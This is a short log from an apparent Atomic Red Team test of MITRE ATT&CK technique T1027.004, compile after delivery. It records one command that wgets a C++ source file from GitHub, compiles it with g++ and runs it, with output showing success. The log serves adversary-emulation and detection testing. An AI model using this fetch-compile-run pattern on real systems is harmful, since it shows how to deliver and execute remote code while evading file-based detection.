[+] Tactic ID   : T1027.004-2
[+] Technique   : Obfuscated Files or Information: Compile After Delivery - CC compile
[+] Command     :
wget -O /tmp/T1027-004-test.cc https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1027.004/src/T1027-004-test.cc && g++ /tmp/T1027-004-test.cc -o /tmp/test_cc && /tmp/test_cc
[+] Success
----- OUTPUT START -----
--2025-08-12 16:22:58--  https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1027.004/src/T1027-004-test.cc
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 115 [text/plain]
Saving to: ‘/tmp/T1027-004-test.cc’

     0K                                                       100% 8.16M=0s

2025-08-12 16:22:58 (8.16 MB/s) - ‘/tmp/T1027-004-test.cc’ saved [115/115]

T1027-004-test.cc has compiled and executed
----- OUTPUT END -----
